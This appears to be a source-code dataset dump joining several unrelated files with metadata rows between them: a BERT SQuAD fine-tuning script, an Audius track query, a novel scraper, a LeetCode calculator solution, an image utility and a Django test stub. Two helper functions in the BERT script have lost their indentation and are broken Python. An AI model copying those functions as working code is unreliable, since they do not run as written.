      "input_mask": tf.FixedLenFeature([seq_length], tf.int64),
      "segment_ids": tf.FixedLenFeature([seq_length], tf.int64),
  }
  if is_training:
    name_to_features["start_positions"] = tf.FixedLenFeature([], tf.int64)
    name_to_features["end_positions"] = tf.FixedLenFeature([], tf.int64)
  def _decode_record(record, name_to_features):
    """Decodes a record to a TensorFlow example."""
    example = tf.parse_single_example(record, name_to_features)
    # tf.Example only supports tf.int64, but the TPU only supports tf.int32.
    # So cast all int64 to int32.
    for name in list(example.keys()):
      t = example[name]
      if t.dtype == tf.int64:
        t = tf.to_int32(t)
      example[name] = t
    return example
  def input_fn(params):
    """The actual input function."""
    batch_size = params["batch_size"]
    # For training, we want a lot of parallel reading and shuffling.
    # For eval, we want no shuffling and parallel reading doesn't matter.
    d = tf.data.TFRecordDataset(input_file)
    if is_training:
      d = d.repeat()
      d = d.shuffle(buffer_size=100)
    d = d.apply(
        contrib_data.map_and_batch(
            lambda record: _decode_record(record, name_to_features),
            batch_size=batch_size,
            drop_remainder=drop_remainder))
    return d
  return input_fn
# Raw model output for one feature, keyed by the feature's unique_id;
# consumed by write_predictions to reconstruct answer spans.
RawResult = collections.namedtuple("RawResult",
                                   ["unique_id", "start_logits", "end_logits"])
def write_predictions(all_examples, all_features, all_results, n_best_size,
                      max_answer_length, do_lower_case, output_prediction_file,
                      output_nbest_file, output_null_log_odds_file):
  """Write final predictions to the json file and log-odds of null if needed.

  For every example, gathers the model outputs of all its doc spans,
  enumerates candidate (start, end) pairs from the top-`n_best_size` logits,
  filters invalid spans, de-tokenizes the best candidates back to original
  text, and writes three json files: best prediction per qas_id, the n-best
  list per qas_id, and (for SQuAD 2.0) the null-vs-best score differences.
  """
  tf.logging.info("Writing predictions to: %s" % (output_prediction_file))
  tf.logging.info("Writing nbest to: %s" % (output_nbest_file))
  example_index_to_features = collections.defaultdict(list)
  for feature in all_features:
    example_index_to_features[feature.example_index].append(feature)
  unique_id_to_result = {}
  for result in all_results:
    unique_id_to_result[result.unique_id] = result
  _PrelimPrediction = collections.namedtuple(  # pylint: disable=invalid-name
      "PrelimPrediction",
      ["feature_index", "start_index", "end_index", "start_logit", "end_logit"])
  all_predictions = collections.OrderedDict()
  all_nbest_json = collections.OrderedDict()
  scores_diff_json = collections.OrderedDict()
  for (example_index, example) in enumerate(all_examples):
    features = example_index_to_features[example_index]
    prelim_predictions = []
    # keep track of the minimum score of null start+end of position 0
    score_null = 1000000  # large and positive
    min_null_feature_index = 0  # the paragraph slice with min null score
    null_start_logit = 0  # the start logit at the slice with min null score
    null_end_logit = 0  # the end logit at the slice with min null score
    for (feature_index, feature) in enumerate(features):
      result = unique_id_to_result[feature.unique_id]
      start_indexes = _get_best_indexes(result.start_logits, n_best_size)
      end_indexes = _get_best_indexes(result.end_logits, n_best_size)
      # if we could have irrelevant answers, get the min score of irrelevant
      if FLAGS.version_2_with_negative:
        feature_null_score = result.start_logits[0] + result.end_logits[0]
        if feature_null_score < score_null:
          score_null = feature_null_score
          min_null_feature_index = feature_index
          null_start_logit = result.start_logits[0]
          null_end_logit = result.end_logits[0]
      for start_index in start_indexes:
        for end_index in end_indexes:
          # We could hypothetically create invalid predictions, e.g., predict
          # that the start of the span is in the question. We throw out all
          # invalid predictions.
          if start_index >= len(feature.tokens):
            continue
          if end_index >= len(feature.tokens):
            continue
          if start_index not in feature.token_to_orig_map:
            continue
          if end_index not in feature.token_to_orig_map:
            continue
          if not feature.token_is_max_context.get(start_index, False):
            continue
          if end_index < start_index:
            continue
          length = end_index - start_index + 1
          if length > max_answer_length:
            continue
          prelim_predictions.append(
              _PrelimPrediction(
                  feature_index=feature_index,
                  start_index=start_index,
                  end_index=end_index,
                  start_logit=result.start_logits[start_index],
                  end_logit=result.end_logits[end_index]))
    if FLAGS.version_2_with_negative:
      prelim_predictions.append(
          _PrelimPrediction(
              feature_index=min_null_feature_index,
              start_index=0,
              end_index=0,
              start_logit=null_start_logit,
              end_logit=null_end_logit))
    prelim_predictions = sorted(
        prelim_predictions,
        key=lambda x: (x.start_logit + x.end_logit),
        reverse=True)
    _NbestPrediction = collections.namedtuple(  # pylint: disable=invalid-name
        "NbestPrediction", ["text", "start_logit", "end_logit"])
    seen_predictions = {}
    nbest = []
    for pred in prelim_predictions:
      if len(nbest) >= n_best_size:
        break
      feature = features[pred.feature_index]
      if pred.start_index > 0:  # this is a non-null prediction
        tok_tokens = feature.tokens[pred.start_index:(pred.end_index + 1)]
        orig_doc_start = feature.token_to_orig_map[pred.start_index]
        orig_doc_end = feature.token_to_orig_map[pred.end_index]
        orig_tokens = example.doc_tokens[orig_doc_start:(orig_doc_end + 1)]
        tok_text = " ".join(tok_tokens)
        # De-tokenize WordPieces that have been split off.
        tok_text = tok_text.replace(" ##", "")
        tok_text = tok_text.replace("##", "")
        # Clean whitespace
        tok_text = tok_text.strip()
        tok_text = " ".join(tok_text.split())
        orig_text = " ".join(orig_tokens)
        final_text = get_final_text(tok_text, orig_text, do_lower_case)
        if final_text in seen_predictions:
          continue
        seen_predictions[final_text] = True
      else:
        final_text = ""
        seen_predictions[final_text] = True
      nbest.append(
          _NbestPrediction(
              text=final_text,
              start_logit=pred.start_logit,
              end_logit=pred.end_logit))
    # if we didn't include the empty option in the n-best, include it
    if FLAGS.version_2_with_negative:
      if "" not in seen_predictions:
        nbest.append(
            _NbestPrediction(
                text="", start_logit=null_start_logit,
                end_logit=null_end_logit))
    # In very rare edge cases we could have no valid predictions. So we
    # just create a nonce prediction in this case to avoid failure.
    if not nbest:
      nbest.append(
          _NbestPrediction(text="empty", start_logit=0.0, end_logit=0.0))
    assert len(nbest) >= 1
    total_scores = []
    best_non_null_entry = None
    for entry in nbest:
      total_scores.append(entry.start_logit + entry.end_logit)
      if not best_non_null_entry:
        if entry.text:
          best_non_null_entry = entry
    probs = _compute_softmax(total_scores)
    nbest_json = []
    for (i, entry) in enumerate(nbest):
      output = collections.OrderedDict()
      output["text"] = entry.text
      output["probability"] = probs[i]
      output["start_logit"] = entry.start_logit
      output["end_logit"] = entry.end_logit
      nbest_json.append(output)
    assert len(nbest_json) >= 1
    if not FLAGS.version_2_with_negative:
      all_predictions[example.qas_id] = nbest_json[0]["text"]
    else:
      # predict "" iff the null score - the score of best non-null > threshold
      score_diff = score_null - best_non_null_entry.start_logit - (
          best_non_null_entry.end_logit)
      scores_diff_json[example.qas_id] = score_diff
      if score_diff > FLAGS.null_score_diff_threshold:
        all_predictions[example.qas_id] = ""
      else:
        all_predictions[example.qas_id] = best_non_null_entry.text
    all_nbest_json[example.qas_id] = nbest_json
  with tf.gfile.GFile(output_prediction_file, "w") as writer:
    writer.write(json.dumps(all_predictions, indent=4) + "\n")
  with tf.gfile.GFile(output_nbest_file, "w") as writer:
    writer.write(json.dumps(all_nbest_json, indent=4) + "\n")
  if FLAGS.version_2_with_negative:
    with tf.gfile.GFile(output_null_log_odds_file, "w") as writer:
      writer.write(json.dumps(scores_diff_json, indent=4) + "\n")
def get_final_text(pred_text, orig_text, do_lower_case):
  """Project the tokenized prediction back to the original text.

  Args:
    pred_text: predicted answer span, already WordPiece-tokenized and
      whitespace-joined.
    orig_text: span of the original (untokenized) document text that the
      prediction was drawn from.
    do_lower_case: whether tokenization lower-cases, so the alignment
      tokenizer matches the model's tokenizer.

  Returns:
    The sub-span of `orig_text` best matching `pred_text`, or `orig_text`
    unchanged whenever the alignment heuristic fails.
  """
  # When we created the data, we kept track of the alignment between original
  # (whitespace tokenized) tokens and our WordPiece tokenized tokens. So
  # now `orig_text` contains the span of our original text corresponding to the
  # span that we predicted.
  #
  # However, `orig_text` may contain extra characters that we don't want in
  # our prediction.
  #
  # For example, let's say:
  #   pred_text = steve smith
  #   orig_text = Steve Smith's
  #
  # We don't want to return `orig_text` because it contains the extra "'s".
  #
  # We don't want to return `pred_text` because it's already been normalized
  # (the SQuAD eval script also does punctuation stripping/lower casing but
  # our tokenizer does additional normalization like stripping accent
  # characters).
  #
  # What we really want to return is "Steve Smith".
  #
  # Therefore, we have to apply a semi-complicated alignment heuristic between
  # `pred_text` and `orig_text` to get a character-to-character alignment. This
  # can fail in certain cases in which case we just return `orig_text`.
  def _strip_spaces(text):
    # Returns (text with spaces removed, map from stripped index -> original
    # index) so positions can be projected back after comparison.
    ns_chars = []
    ns_to_s_map = collections.OrderedDict()
    for (i, c) in enumerate(text):
      if c == " ":
        continue
      ns_to_s_map[len(ns_chars)] = i
      ns_chars.append(c)
    ns_text = "".join(ns_chars)
    return (ns_text, ns_to_s_map)
  # We first tokenize `orig_text`, strip whitespace from the result
  # and `pred_text`, and check if they are the same length. If they are
  # NOT the same length, the heuristic has failed. If they are the same
  # length, we assume the characters are one-to-one aligned.
  tokenizer = tokenization.BasicTokenizer(do_lower_case=do_lower_case)
  tok_text = " ".join(tokenizer.tokenize(orig_text))
  start_position = tok_text.find(pred_text)
  if start_position == -1:
    if FLAGS.verbose_logging:
      tf.logging.info("Unable to find text: '%s' in '%s'" %
                      (pred_text, orig_text))
    return orig_text
  end_position = start_position + len(pred_text) - 1
  (orig_ns_text, orig_ns_to_s_map) = _strip_spaces(orig_text)
  (tok_ns_text, tok_ns_to_s_map) = _strip_spaces(tok_text)
  if len(orig_ns_text) != len(tok_ns_text):
    if FLAGS.verbose_logging:
      tf.logging.info("Length not equal after stripping spaces: '%s' vs '%s'",
                      orig_ns_text, tok_ns_text)
    return orig_text
  # We then project the characters in `pred_text` back to `orig_text` using
  # the character-to-character alignment.
  tok_s_to_ns_map = {}
  for (i, tok_index) in six.iteritems(tok_ns_to_s_map):
    tok_s_to_ns_map[tok_index] = i
  orig_start_position = None
  if start_position in tok_s_to_ns_map:
    ns_start_position = tok_s_to_ns_map[start_position]
    if ns_start_position in orig_ns_to_s_map:
      orig_start_position = orig_ns_to_s_map[ns_start_position]
  if orig_start_position is None:
    if FLAGS.verbose_logging:
      tf.logging.info("Couldn't map start position")
    return orig_text
  orig_end_position = None
  if end_position in tok_s_to_ns_map:
    ns_end_position = tok_s_to_ns_map[end_position]
    if ns_end_position in orig_ns_to_s_map:
      orig_end_position = orig_ns_to_s_map[ns_end_position]
  if orig_end_position is None:
    if FLAGS.verbose_logging:
      tf.logging.info("Couldn't map end position")
    return orig_text
  # Both endpoints mapped successfully: slice the original text.
  output_text = orig_text[orig_start_position:(orig_end_position + 1)]
  return output_text
def _get_best_indexes(logits, n_best_size):
"""Get the n-best logits from a list."""
index_and_score = sorted(enumerate(logits), key=lambda x: x[1], reverse=True)
best_indexes = []
for i in range(len(index_and_score)):
if i >= n_best_size:
break
best_indexes.append(index_and_score[i][0])
return best_indexes
def _compute_softmax(scores):
"""Compute softmax probability over raw logits."""
if not scores:
return []
max_score = None
for score in scores:
if max_score is None or score > max_score:
max_score = score
exp_scores = []
total_sum = 0.0
for score in scores:
x = math.exp(score - max_score)
exp_scores.append(x)
total_sum += x
probs = []
for score in exp_scores:
probs.append(score / total_sum)
return probs
class FeatureWriter(object):
  """Writes InputFeature to TF example file.

  Serializes each feature as a tf.train.Example into a TFRecord file so the
  input pipeline can stream features from disk instead of holding them all
  in memory.
  """
  def __init__(self, filename, is_training):
    # filename: output TFRecord path.
    # is_training: when True, label positions and the is_impossible flag
    #   are serialized in addition to the model inputs.
    self.filename = filename
    self.is_training = is_training
    self.num_features = 0
    self._writer = tf.python_io.TFRecordWriter(filename)
  def process_feature(self, feature):
    """Write a InputFeature to the TFRecordWriter as a tf.train.Example."""
    self.num_features += 1
    def create_int_feature(values):
      # Wrap a sequence of ints as an int64-list tf.train.Feature.
      feature = tf.train.Feature(
          int64_list=tf.train.Int64List(value=list(values)))
      return feature
    features = collections.OrderedDict()
    features["unique_ids"] = create_int_feature([feature.unique_id])
    features["input_ids"] = create_int_feature(feature.input_ids)
    features["input_mask"] = create_int_feature(feature.input_mask)
    features["segment_ids"] = create_int_feature(feature.segment_ids)
    if self.is_training:
      # Labels are only present (and only meaningful) during training.
      features["start_positions"] = create_int_feature([feature.start_position])
      features["end_positions"] = create_int_feature([feature.end_position])
      impossible = 0
      if feature.is_impossible:
        impossible = 1
      features["is_impossible"] = create_int_feature([impossible])
    tf_example = tf.train.Example(features=tf.train.Features(feature=features))
    self._writer.write(tf_example.SerializeToString())
  def close(self):
    # Flush and close the underlying TFRecord writer.
    self._writer.close()
def validate_flags_or_throw(bert_config):
  """Validate the input FLAGS or throw an exception.

  Checks cross-flag consistency (case matching against the checkpoint,
  required input files per mode, and sequence-length bounds against the
  model config). Raises ValueError on the first violation found.
  """
  tokenization.validate_case_matches_checkpoint(FLAGS.do_lower_case,
                                                FLAGS.init_checkpoint)
  if not FLAGS.do_train and not FLAGS.do_predict:
    raise ValueError("At least one of `do_train` or `do_predict` must be True.")
  if FLAGS.do_train:
    if not FLAGS.train_file:
      raise ValueError(
          "If `do_train` is True, then `train_file` must be specified.")
  if FLAGS.do_predict:
    if not FLAGS.predict_input_file:
      raise ValueError(
          "If `do_predict` is True, then specify `predict_input_file`")
  # The model's position embeddings cap the usable sequence length.
  if FLAGS.max_seq_length > bert_config.max_position_embeddings:
    raise ValueError(
        "Cannot use sequence length %d because the BERT model "
        "was only trained up to sequence length %d" %
        (FLAGS.max_seq_length, bert_config.max_position_embeddings))
  # +3 accounts for the [CLS] and two [SEP] special tokens.
  if FLAGS.max_seq_length <= FLAGS.max_query_length + 3:
    raise ValueError(
        "The max_seq_length (%d) must be greater than max_query_length "
        "(%d) + 3" % (FLAGS.max_seq_length, FLAGS.max_query_length))
def main(_):
  """Entry point: runs SQuAD-style training and/or prediction per FLAGS."""
  tf.logging.set_verbosity(tf.logging.INFO)
  bert_config = modeling.BertConfig.from_json_file(FLAGS.bert_config_file)
  validate_flags_or_throw(bert_config)
  tf.gfile.MakeDirs(FLAGS.output_dir)
  tokenizer = tokenization.FullTokenizer(
      vocab_file=FLAGS.vocab_file, do_lower_case=FLAGS.do_lower_case)
  # TPU setup: a cluster resolver is only needed on a real TPU.
  tpu_cluster_resolver = None
  if FLAGS.use_tpu and FLAGS.tpu_name:
    tpu_cluster_resolver = contrib_cluster_resolver.TPUClusterResolver(
        FLAGS.tpu_name, zone=FLAGS.tpu_zone, project=FLAGS.gcp_project)
  is_per_host = contrib_tpu.InputPipelineConfig.PER_HOST_V2
  run_config = contrib_tpu.RunConfig(
      cluster=tpu_cluster_resolver,
      master=FLAGS.master,
      model_dir=FLAGS.output_dir,
      save_checkpoints_steps=FLAGS.save_checkpoints_steps,
      tpu_config=contrib_tpu.TPUConfig(
          iterations_per_loop=FLAGS.iterations_per_loop,
          num_shards=FLAGS.num_tpu_cores,
          per_host_input_for_training=is_per_host))
  train_examples = None
  num_train_steps = None
  num_warmup_steps = None
  if FLAGS.do_train:
    train_examples = read_squad_examples(
        input_file=FLAGS.train_file, is_training=True)
    # Total steps derived from epochs; warmup is a fixed proportion of them.
    num_train_steps = int(
        len(train_examples) / FLAGS.train_batch_size * FLAGS.num_train_epochs)
    num_warmup_steps = int(num_train_steps * FLAGS.warmup_proportion)
    # Pre-shuffle the input to avoid having to make a very large shuffle
    # buffer in the `input_fn`.
    rng = random.Random(12345)
    rng.shuffle(train_examples)
  model_fn = model_fn_builder(
      bert_config=bert_config,
      init_checkpoint=FLAGS.init_checkpoint,
      learning_rate=FLAGS.learning_rate,
      num_train_steps=num_train_steps,
      num_warmup_steps=num_warmup_steps,
      use_tpu=FLAGS.use_tpu,
      use_one_hot_embeddings=FLAGS.use_tpu)
  # If TPU is not available, this will fall back to normal Estimator on CPU
  # or GPU.
  estimator = contrib_tpu.TPUEstimator(
      use_tpu=FLAGS.use_tpu,
      model_fn=model_fn,
      config=run_config,
      train_batch_size=FLAGS.train_batch_size,
      predict_batch_size=FLAGS.predict_batch_size)
  if FLAGS.do_train:
    # We write to a temporary file to avoid storing very large constant tensors
    # in memory.
    train_writer = FeatureWriter(
        filename=os.path.join(FLAGS.output_dir,
                              "train.tf_record." + FLAGS.exp_name),
        is_training=True)
    convert_examples_to_features(
        examples=train_examples,
        tokenizer=tokenizer,
        max_seq_length=FLAGS.max_seq_length,
        doc_stride=FLAGS.doc_stride,
        max_query_length=FLAGS.max_query_length,
        is_training=True,
        output_fn=train_writer.process_feature)
    train_writer.close()
    tf.logging.info("***** Running training *****")
    tf.logging.info("  Num orig examples = %d", len(train_examples))
    tf.logging.info("  Num split examples = %d", train_writer.num_features)
    tf.logging.info("  Batch size = %d", FLAGS.train_batch_size)
    tf.logging.info("  Num steps = %d", num_train_steps)
    # Examples are no longer needed once serialized to the TFRecord file.
    del train_examples
    train_input_fn = input_fn_builder(
        input_file=train_writer.filename,
        seq_length=FLAGS.max_seq_length,
        is_training=True,
        drop_remainder=True)
    estimator.train(input_fn=train_input_fn, max_steps=num_train_steps)
  if FLAGS.do_predict:
    eval_examples = read_squad_examples(
        input_file=FLAGS.predict_input_file, is_training=False)
    eval_writer = FeatureWriter(
        filename=os.path.join(FLAGS.output_dir,
                              "eval.tf_record." + FLAGS.exp_name),
        is_training=False)
    eval_features = []
    def append_feature(feature):
      # Keep features both in memory (for write_predictions) and on disk.
      eval_features.append(feature)
      eval_writer.process_feature(feature)
    convert_examples_to_features(
        examples=eval_examples,
        tokenizer=tokenizer,
        max_seq_length=FLAGS.max_seq_length,
        doc_stride=FLAGS.doc_stride,
        max_query_length=FLAGS.max_query_length,
        is_training=False,
        output_fn=append_feature)
    eval_writer.close()
    tf.logging.info("***** Running predictions *****")
    tf.logging.info("  Num orig examples = %d", len(eval_examples))
    tf.logging.info("  Num split examples = %d", len(eval_features))
    tf.logging.info("  Batch size = %d", FLAGS.predict_batch_size)
    all_results = []
    predict_input_fn = input_fn_builder(
        input_file=eval_writer.filename,
        seq_length=FLAGS.max_seq_length,
        is_training=False,
        drop_remainder=False)
    # If running eval on the TPU, you will need to specify the number of
    # steps.
    all_results = []
    for result in estimator.predict(
        predict_input_fn, yield_single_examples=True):
      if len(all_results) % 1000 == 0:
        tf.logging.info("Processing example: %d" % (len(all_results)))
      unique_id = int(result["unique_ids"])
      start_logits = [float(x) for x in result["start_logits"].flat]
      end_logits = [float(x) for x in result["end_logits"].flat]
      all_results.append(
          RawResult(
              unique_id=unique_id,
              start_logits=start_logits,
              end_logits=end_logits))
    # Output locations: prefer predict_output_dir when it is set.
    if FLAGS.predict_output_dir:
      tf.gfile.MakeDirs(FLAGS.predict_output_dir)
      output_prediction_file = os.path.join(FLAGS.predict_output_dir,
                                            "predictions.json")
      output_nbest_file = os.path.join(FLAGS.predict_output_dir,
                                       "nbest_predictions.json")
      output_null_log_odds_file = os.path.join(FLAGS.predict_output_dir,
                                               "null_odds.json")
    else:
      output_prediction_file = os.path.join(FLAGS.output_dir,
                                            "predictions.json")
      output_nbest_file = os.path.join(FLAGS.output_dir,
                                       "nbest_predictions.json")
      output_null_log_odds_file = os.path.join(FLAGS.output_dir,
                                               "null_odds.json")
    write_predictions(eval_examples, eval_features, all_results,
                      FLAGS.n_best_size, FLAGS.max_answer_length,
                      FLAGS.do_lower_case, output_prediction_file,
                      output_nbest_file, output_null_log_odds_file)
if __name__ == "__main__":
  # These flags have no usable defaults; fail fast if they are missing.
  flags.mark_flag_as_required("vocab_file")
  flags.mark_flag_as_required("bert_config_file")
  flags.mark_flag_as_required("output_dir")
  tf.app.run()
| 36.575896 | 82 | 0.67154 |
ec7ce51b5a9a800ec1e562ae9b96990ed424cf3c | 2,783 | py | Python | discovery-provider/src/queries/get_remixable_tracks.py | csjiang/audius-protocol | 31fb3862ec5bc81f792f991268802d3dcc0ea9f4 | [
"Apache-2.0"
] | 429 | 2019-08-14T01:34:07.000Z | 2022-03-30T06:31:38.000Z | discovery-provider/src/queries/get_remixable_tracks.py | SNOmad1/audius-protocol | 3d5fc2bf688265eb529060f1f3234ef2b95ed231 | [
"Apache-2.0"
] | 998 | 2019-08-14T01:52:37.000Z | 2022-03-31T23:17:22.000Z | discovery-provider/src/queries/get_remixable_tracks.py | SNOmad1/audius-protocol | 3d5fc2bf688265eb529060f1f3234ef2b95ed231 | [
"Apache-2.0"
] | 73 | 2019-10-04T04:24:16.000Z | 2022-03-24T16:27:30.000Z | from sqlalchemy import desc
from sqlalchemy.orm import aliased
from src.models import Track, Stem, AggregateTrack
from src.queries.query_helpers import (
populate_track_metadata,
add_users_to_tracks,
decayed_score,
)
from src.utils.db_session import get_db_read_replica
from src.utils import helpers
def get_remixable_tracks(args):
    """Gets a list of remixable tracks.

    Args:
        args: dict with optional keys:
            limit: max number of tracks to return (default 25).
            current_user_id: user id used to personalize repost/save fields.
            with_users: when True, attach user objects to each track.

    Returns:
        List of track dicts, each annotated with a decayed popularity
        "score", ordered by that score descending.
    """
    db = get_db_read_replica()
    limit = args.get("limit", 25)
    current_user_id = args.get("current_user_id", None)
    StemTrack = aliased(Track)
    with db.scoped_session() as session:
        # Subquery to get current tracks that have stems
        # (`== True`/`== False` are SQLAlchemy column comparisons, not
        # Python equality — do not "fix" them to `is`).
        remixable_tracks_subquery = (
            session.query(Track)
            .join(Stem, Stem.parent_track_id == Track.track_id)
            .join(StemTrack, Stem.child_track_id == StemTrack.track_id)
            .filter(
                Track.is_current == True,
                Track.is_unlisted == False,
                Track.is_delete == False,
                StemTrack.is_current == True,
                StemTrack.is_unlisted == False,
                StemTrack.is_delete == False,
            )
            .distinct(Track.track_id)
            .subquery()
        )
        track_alias = aliased(Track, remixable_tracks_subquery)
        # Popularity = reposts + saves, per track.
        count_subquery = session.query(
            AggregateTrack.track_id.label("id"),
            (AggregateTrack.repost_count + AggregateTrack.save_count).label("count"),
        ).subquery()
        # Rank remixable tracks by time-decayed popularity score.
        query = (
            session.query(
                track_alias,
                count_subquery.c["count"],
                decayed_score(count_subquery.c["count"], track_alias.created_at).label(
                    "score"
                ),
            )
            .join(
                count_subquery,
                count_subquery.c["id"] == track_alias.track_id,
            )
            .order_by(desc("score"), desc(track_alias.track_id))
            .limit(limit)
        )
        results = query.all()
        tracks = []
        for result in results:
            # Each row is (Track, count, score); keep the model and the score.
            track = result[0]
            score = result[-1]
            track = helpers.model_to_dictionary(track)
            track["score"] = score
            tracks.append(track)
        track_ids = list(map(lambda track: track["track_id"], tracks))
        # Get user specific data for tracks
        tracks = populate_track_metadata(session, track_ids, tracks, current_user_id)
        if args.get("with_users", False):
            add_users_to_tracks(session, tracks, current_user_id)
        else:
            # Remove the user from the tracks
            tracks = [
                {key: val for key, val in dict.items() if key != "user"}
                for dict in tracks
            ]
        return tracks
| 32.360465 | 87 | 0.575278 |
4798b8138753f02d235e2640cb57a555f8610b60 | 888 | py | Python | util/parser.py | zlasd/novelS | 44905ec0477806f8aee377e098d4311d65aabd18 | [
"MIT"
] | 1 | 2021-06-07T08:18:56.000Z | 2021-06-07T08:18:56.000Z | util/parser.py | zlasd/novelS | 44905ec0477806f8aee377e098d4311d65aabd18 | [
"MIT"
] | null | null | null | util/parser.py | zlasd/novelS | 44905ec0477806f8aee377e098d4311d65aabd18 | [
"MIT"
] | null | null | null | from bs4 import BeautifulSoup
from util import log
def find_chap_list(content: str, link_format="{}", format_map=None, list_class="listmain", ignore_chap=0):
    """Extract (link, title) pairs for every chapter on a chapter-list page.

    Args:
        content: raw HTML of the chapter-list page.
        link_format: format string used to build each chapter URL; the raw
            href is exposed to it as ``{chap_id}``.
        format_map: extra substitutions for ``link_format``. Defaults to an
            empty mapping; the argument is copied, so the caller's dict is
            never mutated.
        list_class: CSS class of the element containing the chapter anchors.
        ignore_chap: number of leading anchors to skip (e.g. "latest
            chapter" shortcuts at the top of the list).

    Returns:
        List of ``(url, title)`` tuples in page order.
    """
    soup = BeautifulSoup(content, 'html.parser')
    tag_main_list = soup.find(class_=list_class)
    tag_chap_list = tag_main_list.find_all('a')
    # Bug fix: the original signature used the mutable default `format_map={}`
    # and wrote "chap_id" into it, leaking state across calls and mutating a
    # caller-supplied dict. Copy into a fresh dict instead.
    format_map = dict(format_map) if format_map else {}
    ret = []
    for a in tag_chap_list[ignore_chap:]:
        link = a.get("href")
        if link is not None:
            format_map["chap_id"] = link
            # Collapse internal whitespace in the anchor text for the title.
            title = ' '.join(a.string.split())
            ret.append((link_format.format(**format_map), title))
    log.log_info(ret)
    return ret
def parse_content(text: str, txt_class="showtxt") -> str:
    """Extract the chapter body text from an HTML page.

    Collects the stripped strings inside the element carrying ``txt_class``,
    drops the final entry (site boilerplate), and joins the rest as
    blank-line-separated paragraphs.
    """
    soup = BeautifulSoup(text, 'html.parser')
    container = soup.find(class_=txt_class)
    paragraphs = list(container.stripped_strings)
    return '\n\n'.join(paragraphs[:-1])
| 28.645161 | 104 | 0.647523 |
7e103a70ea1927e93815205499d882c1be64e83d | 921 | py | Python | string/0227_basic_calculator_ii/0227_basic_calculator_ii.py | zdyxry/LeetCode | 33371285d0f3302158230f46e8b1b63b9f4639c4 | [
"Xnet",
"X11"
] | 6 | 2019-09-16T01:50:44.000Z | 2020-09-17T08:52:25.000Z | string/0227_basic_calculator_ii/0227_basic_calculator_ii.py | zdyxry/LeetCode | 33371285d0f3302158230f46e8b1b63b9f4639c4 | [
"Xnet",
"X11"
] | null | null | null | string/0227_basic_calculator_ii/0227_basic_calculator_ii.py | zdyxry/LeetCode | 33371285d0f3302158230f46e8b1b63b9f4639c4 | [
"Xnet",
"X11"
] | 4 | 2020-02-07T12:43:16.000Z | 2021-04-11T06:38:55.000Z | class Solution(object):
def calculate(self, s):
if not s:
return "0"
stack, num, sign = [], 0, "+"
for i in xrange(len(s)):
if s[i].isdigit():
num = num*10 + ord(s[i])-ord("0")
if (not s[i].isdigit() and not s[i].isspace()) or i == len(s) - 1:
if sign == "-":
stack.append(-num)
elif sign == "+":
stack.append(num)
elif sign == "*":
stack.append(stack.pop()*num)
else:
tmp = stack.pop()
if tmp//num < 0 and tmp % num != 0:
stack.append(tmp//num+1)
else:
stack.append(tmp//num)
sign = s[i]
num = 0
return sum(stack)
# Manual smoke test: "3+2*2" should evaluate to 7.
s = "3+2*2"
res = Solution().calculate(s)
print(res) | 31.758621 | 78 | 0.374593 |
01059c955ac21721c14181997735f11a9036368e | 1,570 | py | Python | util/util_imageIO.py | google/dynamic-video-depth | 7dab8f9e156fa35735301695ea020aee7221fb31 | [
"Apache-2.0"
] | 144 | 2021-08-09T21:05:57.000Z | 2022-03-30T17:37:43.000Z | util/util_imageIO.py | vedaldi/dynamic-video-depth | 274f5f59604a10121a2445f7b30df4a9ff075946 | [
"Apache-2.0"
] | 11 | 2021-08-17T13:58:55.000Z | 2022-03-28T08:12:29.000Z | util/util_imageIO.py | vedaldi/dynamic-video-depth | 274f5f59604a10121a2445f7b30df4a9ff075946 | [
"Apache-2.0"
] | 20 | 2021-08-12T13:51:35.000Z | 2022-03-13T22:33:50.000Z | # Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from PIL import Image
import numpy as np
from skimage.transform import resize as imresize
def read_image(path, load_alpha=False):
    """Read an image file into a numpy array.

    Args:
        path: path to the image file.
        load_alpha: when True, keep a 4th (alpha) channel if the file has
            one; otherwise the result is truncated to the first 3 channels.

    Returns:
        np.ndarray of shape (H, W) for grayscale images, or (H, W, 3) /
        (H, W, 4) for color images depending on `load_alpha`.

    Raises:
        ValueError: if the decoded array is not 2- or 3-dimensional.
    """
    im = np.asarray(Image.open(path))
    dims = len(im.shape)
    if dims == 2:
        # Grayscale: nothing to truncate.
        return im
    if dims == 3:
        # Plain RGB passes through; alpha is kept only on request.
        if im.shape[-1] == 3 or load_alpha:
            return im
        return im[..., :3]
    # Fixed spelling of the original message ("encoutered"/"except").
    raise ValueError(f'invalid dimensions encountered. Only expect dims 2,3 but encountered {dims}')
def resize_image(im, size=None, scale=None):
    """Resize `im` to `size` (H, W), or shrink both sides by integer `scale`.

    Exactly one of `size` or `scale` is expected; `scale` takes precedence
    when both are given.
    """
    if scale:
        height, width = im.shape[:2]
        target = (height // scale, width // scale)
    else:
        target = size
    return imresize(im, target)
def hwc2chw(im):
    """Convert an HWC image array to CHW layout.

    Grayscale (H, W) input gains a leading 1-channel axis; (H, W, C) input
    is transposed to (C, H, W).
    """
    dims = len(im.shape)
    if dims == 2:
        # (H, W) -> (1, H, W)
        return im[None, ...]
    if dims == 3:
        # (H, W, C) -> (C, H, W)
        return np.transpose(im, (2, 0, 1))
    raise ValueError(f'invalid dimensions encoutered. Only except dims 2,3 but encoutered {dims}')
| 28.035714 | 102 | 0.636306 |
d5435a10da95de18d3f3a53ad7e5e0597ac5b50e | 6,950 | py | Python | apps/groups/tests/test_views.py | storagebot/kitsune | 613ba2ca09104f330ab77088b452391169096249 | [
"BSD-3-Clause"
] | 2 | 2019-08-19T17:08:47.000Z | 2019-10-05T11:37:02.000Z | apps/groups/tests/test_views.py | taliasman/kitsune | f8085205eef143011adb4c52d1f183da06c1c58e | [
"BSD-3-Clause"
] | null | null | null | apps/groups/tests/test_views.py | taliasman/kitsune | f8085205eef143011adb4c52d1f183da06c1c58e | [
"BSD-3-Clause"
] | null | null | null | import os
from django.core.files import File
from nose.tools import eq_
from groups.models import GroupProfile
from groups.tests import group_profile
from sumo.helpers import urlparams
from sumo.tests import TestCase
from sumo.urlresolvers import reverse
from users.tests import user, group, add_permission
class EditGroupProfileTests(TestCase):
    """Tests for the group-profile edit view: permission vs. leader access."""
    def setUp(self):
        super(EditGroupProfileTests, self).setUp()
        self.user = user(save=True)
